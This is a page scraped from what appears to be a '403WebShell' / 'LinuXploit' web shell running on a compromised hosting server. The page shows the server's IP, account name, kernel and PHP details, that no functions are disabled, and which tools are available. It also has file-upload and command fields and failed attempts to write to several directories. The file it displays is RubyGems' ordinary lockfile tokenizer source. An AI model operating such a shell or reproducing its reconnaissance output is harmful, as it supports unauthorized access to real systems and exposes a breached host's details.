Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.147.56.125
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/ruby32/share/rubygems/rubygems/request_set/lockfile/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/ruby32/share/rubygems/rubygems/request_set/lockfile/tokenizer.rb
# frozen_string_literal: true

#) frozen_string_literal: true
require_relative "parser"

class Gem::RequestSet::Lockfile::Tokenizer
  Token = Struct.new :type, :value, :column, :line
  EOF   = Token.new :EOF

  def self.from_file(file)
    new File.read(file), file
  end

  def initialize(input, filename = nil, line = 0, pos = 0)
    @line     = line
    @line_pos = pos
    @tokens   = []
    @filename = filename
    tokenize input
  end

  def make_parser(set, platforms)
    Gem::RequestSet::Lockfile::Parser.new self, set, platforms, @filename
  end

  def to_a
    @tokens.map {|token| [token.type, token.value, token.column, token.line] }
  end

  def skip(type)
    @tokens.shift while !@tokens.empty? && peek.type == type
  end

  ##
  # Calculates the column (by byte) and the line of the current token based on
  # +byte_offset+.

  def token_pos(byte_offset) # :nodoc:
    [byte_offset - @line_pos, @line]
  end

  def empty?
    @tokens.empty?
  end

  def unshift(token)
    @tokens.unshift token
  end

  def next_token
    @tokens.shift
  end
  alias :shift :next_token

  def peek
    @tokens.first || EOF
  end

  private

  def tokenize(input)
    require "strscan"
    s = StringScanner.new input

    until s.eos? do
      pos = s.pos

      pos = s.pos if leading_whitespace = s.scan(/ +/)

      if s.scan(/[<|=>]{7}/)
        message = "your #{@filename} contains merge conflict markers"
        column, line = token_pos pos

        raise Gem::RequestSet::Lockfile::ParseError.new message, column, line, @filename
      end

      @tokens <<
        case
        when s.scan(/\r?\n/) then
          token = Token.new(:newline, nil, *token_pos(pos))
          @line_pos = s.pos
          @line += 1
          token
        when s.scan(/[A-Z]+/) then
          if leading_whitespace
            text = s.matched
            text += s.scan(/[^\s)]*/).to_s # in case of no match
            Token.new(:text, text, *token_pos(pos))
          else
            Token.new(:section, s.matched, *token_pos(pos))
          end
        when s.scan(/([a-z]+):\s/) then
          s.pos -= 1 # rewind for possible newline
          Token.new(:entry, s[1], *token_pos(pos))
        when s.scan(/\(/) then
          Token.new(:l_paren, nil, *token_pos(pos))
        when s.scan(/\)/) then
          Token.new(:r_paren, nil, *token_pos(pos))
        when s.scan(/<=|>=|=|~>|<|>|!=/) then
          Token.new(:requirement, s.matched, *token_pos(pos))
        when s.scan(/,/) then
          Token.new(:comma, nil, *token_pos(pos))
        when s.scan(/!/) then
          Token.new(:bang, nil, *token_pos(pos))
        when s.scan(/[^\s),!]*/) then
          Token.new(:text, s.matched, *token_pos(pos))
        else
          raise "BUG: can't create token for: #{s.string[s.pos..-1].inspect}"
        end
    end

    @tokens
  end
end

Youez - 2016 - github.com/yon3zu
LinuXploit